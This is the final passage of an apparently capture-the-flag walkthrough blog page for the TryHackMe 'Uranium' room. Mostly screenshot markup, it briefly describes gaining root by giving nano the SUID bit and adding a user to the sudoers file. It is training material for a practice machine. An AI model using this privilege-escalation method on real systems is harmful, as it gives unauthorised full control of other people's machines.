,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-2xl.png 1600w" alt="uranium nano" width="608" height="145" layout="responsive"></amp-img></figure><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-new-mail.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-new-mail-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-new-mail-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-new-mail-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-new-mail-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-new-mail-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-new-mail-2xl.png 1600w" alt="uranium new mail" width="1072" height="148" layout="responsive"></amp-img></figure><p>Kral4 has new mail, let's see what that's about.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-nano-got-SUID.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-2xl.png 1600w" alt="uranium nano got suid" width="1224" height="245" layout="responsive"></amp-img></figure><p>AWESOME!!!! </p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-nano-got-SUID-now.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-now-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-now-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-now-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-now-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-now-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-got-SUID-now-2xl.png 1600w" alt="uranium nano has suid" width="468" height="103" layout="responsive"></amp-img></figure><p>Now that nano has SUID, let's add hakanbey to the sudoers file.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-root.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-root-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-root-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-root-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-root-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-root-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-root-2xl.png 1600w" alt="uranium root access" width="489" height="208" layout="responsive"></amp-img></figure><p>And we have root!!!!!!!!!!🪅🎊🎉🎈🎈🎈</p><p>That was fun! Happy hacking!!</p><aside><ul class="post-tag"><li><a href="https://blog.syncpundit.com/amp/sync/phishing/">Phishing</a></li><li><a href="https://blog.syncpundit.com/amp/sync/walkthroughs/">Walkthroughs</a></li></ul><div class="post-share"><amp-social-share type="system" width="40" height="40" data-param-text="Tryhackme: Uranium CTF Walkthrough"></amp-social-share><amp-social-share type="facebook" width="40" height="40" data-param-app_id="" data-param-text="Tryhackme: Uranium CTF Walkthrough" data-param-href="https://blog.syncpundit.com/amp/uranium-ctf-walkthrough/"></amp-social-share><amp-social-share type="twitter" width="40" height="40" data-param-text="Tryhackme: Uranium CTF Walkthrough" data-param-url="https://blog.syncpundit.com/amp/uranium-ctf-walkthrough/"></amp-social-share><amp-social-share type="pinterest" width="40" height="40" data-param-url="https://blog.syncpundit.com/amp/uranium-ctf-walkthrough/"></amp-social-share><amp-social-share type="tumblr" width="40" height="40" data-param-text="Tryhackme: Uranium CTF Walkthrough" data-param-url="https://blog.syncpundit.com/amp/uranium-ctf-walkthrough/"></amp-social-share><amp-social-share type="whatsapp" width="40" height="40" data-param-text="Tryhackme: Uranium CTF Walkthrough"></amp-social-share></div></aside></div></article></main><amp-animation id="showAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "1",
                            "visibility": "visible",
                            "transform": "scale(1)"
                        }]
                    }]
                }</script></amp-animation><amp-animation id="hideAnim" layout="nodisplay"><script type="application/json">{
                    "duration": "200ms",
                    "fill": "both",
                    "iterations": "1",
                    "direction": "alternate",
                    "animations": [{
                        "selector": ".post-scroll",
                        "keyframes": [{
                            "opacity": "0",
                            "visibility": "hidden",
                            "transform": "scale(0.1)"
                        }]
                    }]
                }</script></amp-animation><div class="post-scroll-marker"><amp-position-observer on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer></div><button class="post-scroll" on="tap:top.scrollTo(duration=200)">&#8593;</button><footer class="bottom">#!/USR/BIN/SYNC_PUNDIT</footer><amp-sidebar id="navbar-sidebar" layout="nodisplay"><ul><li><a href="https://blog.syncpundit.com/amp/sync/phishing/" title="phishing">Phishing</a></li><li><a href="https://blog.syncpundit.com/amp/sync/walkthroughs/" title="walkthroughs">Walkthroughs</a></li><li><a href="https://blog.syncpundit.com/amp/sync/research/" title="research">Research</a></li><li><a href="https://blog.syncpundit.com/amp/sync/threat-intel/" title="threat-intel">Threat Intel</a></li></ul></amp-sidebar></body></html>